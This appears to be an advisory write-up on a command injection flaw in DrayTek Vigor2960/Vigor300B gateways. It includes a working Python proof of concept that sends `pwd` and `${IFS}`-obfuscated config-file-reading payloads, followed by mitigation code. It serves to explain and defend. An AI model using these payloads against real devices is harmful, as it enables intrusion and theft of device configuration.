DrayTek Vigor2960 and Vigor300B gateways are affected by a critical command injection vulnerability.
The flaw is reachable through the /cgi-bin/mainfunction.cgi/apmcfgupload endpoint: an attacker who places shell metacharacters in the session parameter of a crafted HTTP request can run arbitrary commands on the device.
More than 66,000 internet-exposed devices are affected. Successful exploitation gives remote code execution on the gateway, full compromise of the device, and potentially access to sensitive data on the networks behind it.
DrayTek Vigor2960 and Vigor300B devices running software version 1.5.1.4 contain the command injection flaw in the Web Management Interface, specifically in the /cgi-bin/mainfunction.cgi/apmcfgupload handler.
An attacker exploits it by embedding commands in the HTTP request; the device executes them with the elevated privileges of the web interface process.
Successful exploitation gives unauthorized access to the device and arbitrary code execution, and can lead to compromise of the network the gateway protects.
The command injection in the apmcfgupload endpoint arises from insufficient input validation of the session parameter: its value reaches a shell without being checked for metacharacters.
The proof-of-concept Python script crafts a malformed HTTP request and sends it over a raw socket rather than through an HTTP client library, so the request reaches the device exactly as written, without a library normalizing, re-encoding, or rejecting it.
The request targets the `apmcfgupload` path and carries, in the session parameter, a hex (percent) encoded `pwd` command as the injected payload.
The script connects to the target, sends the crafted request, and reads back the server's response to see whether the injected command ran. In other words, it triggers execution purely by manipulating the structure of the HTTP request.
Command injection lets an attacker execute arbitrary commands on the underlying operating system by supplying input that the application passes, unsanitized, into a shell command line.
The first example injects a plain `pwd`, which prints the current working directory and so confirms execution with minimal side effects.
The second example is more sophisticated: it uses `${IFS}` (the shell's Internal Field Separator, which expands to whitespace and therefore separates words) in place of literal spaces to get past filters that reject spaces, and runs `cat /etc/persistence/config/device_in*`, which can expose the device's persistent configuration files.
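The following Python block is an added illustration, not NetSecFish's script and not code from the original page. It builds the raw request the write-up describes (one function for the `pwd` probe and the `${IFS}` variant alike), shows what the CGI handler sees after percent-decoding the session parameter, and shows why `${IFS}` slips past a filter that only looks for literal spaces. The exact injection syntax is not given on the page, so backtick command substitution inside the session value, the target host 192.0.2.1, and the naive space filter are assumptions.

```python
import socket
from urllib.parse import quote, unquote

TARGET_PATH = "/cgi-bin/mainfunction.cgi/apmcfgupload"

# Payloads from the write-up. The page does not state how the original script
# wraps them; backtick command substitution is an assumption used here.
PAYLOAD_PWD = "`pwd`"
PAYLOAD_IFS = "`cat${IFS}/etc/persistence/config/device_in*`"


def encode_payload(cmd: str) -> str:
    """Percent (hex) encode every non-alphanumeric byte so the query string
    survives transport unchanged; the device decodes it back before use."""
    return quote(cmd, safe="")


def build_request(host: str, cmd: str) -> bytes:
    """Assemble the raw HTTP/1.1 request; the session parameter carries the injection."""
    query = "session=" + encode_payload(cmd)
    lines = [
        f"GET {TARGET_PATH}?{query} HTTP/1.1",
        f"Host: {host}",
        "User-Agent: Mozilla/5.0",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


def send_raw(host: str, port: int, cmd: str, timeout: float = 5.0) -> bytes:
    """Send over a plain socket, as the page describes, so no HTTP library
    re-encodes or rejects the request. Not exercised by the tests."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(host, cmd))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def decoded_session_value(request: bytes) -> str:
    """What the CGI handler obtains once it percent-decodes the session parameter."""
    request_line = request.split(b"\r\n", 1)[0].decode()
    query = request_line.split(" ")[1].split("?", 1)[1]
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == "session":
            return unquote(value)
    return ""


def blocks_spaces(value: str) -> bool:
    """Illustrative naive filter (assumed, not the device's real one): it only
    rejects literal spaces, which is exactly what ${IFS} avoids."""
    return " " in value


def shell_expansion(value: str) -> str:
    """Approximate sh behaviour: an unquoted ${IFS} expands to whitespace and
    then splits the surrounding text into separate words, so `cat${IFS}/etc/x`
    becomes `cat /etc/x` by the time the command runs."""
    return value.replace("${IFS}", " ")


if __name__ == "__main__":
    # Example host address only (TEST-NET-1); no traffic is sent here.
    print(build_request("192.0.2.1", PAYLOAD_PWD).decode())
    print(shell_expansion(decoded_session_value(build_request("192.0.2.1", PAYLOAD_IFS))))
```

The filter comparison is the instructive part: `blocks_spaces` rejects the spaced form of the `cat` command but accepts the `${IFS}` form, and `shell_expansion` shows that the shell still runs the same command. Any filter that works on literal characters rather than on an allowlist of permitted values has the same weakness.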
To mitigate the issue, NetSecFish recommends strict input validation and sanitization of every CGI script parameter, so that untrusted input can never reach a shell, rather than filtering individual metacharacters.
Restricting access to the web management interface to trusted IP addresses significantly reduces the attack surface: unauthenticated requests from untrusted networks never reach the vulnerable handler, which also limits exposure to any CGI flaw found later.
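As an added example of the two recommendations above (not DrayTek's firmware code and not from the original advisory), the following Python block shows a hardened handler shape: a source-address check against a management allowlist, then an allowlist regex applied to the decoded session value. The session token format, the trusted networks, and the handler's return convention are assumptions chosen for illustration.

```python
import re
from ipaddress import ip_address, ip_network
from urllib.parse import parse_qs

# Assumed session token format; the device's real format is not on the page.
# Allowlisting [A-Za-z0-9] rejects backticks, $(), ${IFS}, ';', newlines and
# any percent-encoded spelling of them, because validation runs after decoding.
SESSION_RE = re.compile(r"\A[A-Za-z0-9]{8,64}\Z")

# Example management networks only; replace with the admin hosts actually trusted.
MANAGEMENT_ALLOWLIST = (ip_network("192.168.1.0/24"), ip_network("10.10.0.0/16"))


def validate_session(decoded_value: str) -> str:
    """Allowlist check on the already percent-decoded value."""
    if not SESSION_RE.fullmatch(decoded_value):
        raise ValueError("session parameter rejected")
    return decoded_value


def client_allowed(client_ip: str) -> bool:
    """True only if the request comes from a trusted management network."""
    try:
        addr = ip_address(client_ip)
    except ValueError:
        return False
    return any(addr in net for net in MANAGEMENT_ALLOWLIST)


def handle_apmcfgupload(client_ip: str, query_string: str) -> tuple[int, str]:
    """Hypothetical hardened handler: source check first, then parameter validation."""
    if not client_allowed(client_ip):
        return 403, "management interface not reachable from this address"
    params = parse_qs(query_string, keep_blank_values=True)  # percent-decodes values
    values = params.get("session", [])
    if len(values) != 1:
        return 400, "exactly one session parameter required"
    try:
        session = validate_session(values[0])
    except ValueError as exc:
        return 400, str(exc)
    # Downstream, pass `session` as one argv element to any helper binary
    # (subprocess with a list, never shell=True or string concatenation), so a
    # validator bug still cannot turn into command injection.
    return 200, f"session {session} accepted"


if __name__ == "__main__":
    print(handle_apmcfgupload("203.0.113.7", "session=abcdef123456"))
    print(handle_apmcfgupload("192.168.1.20", "session=%60pwd%60"))
    print(handle_apmcfgupload("192.168.1.20", "session=abcdef123456"))
```

The order matters: the address check runs before any parsing, so an untrusted client never exercises the parameter handling at all, and the validator inspects the decoded value, which is the form the shell would have seen.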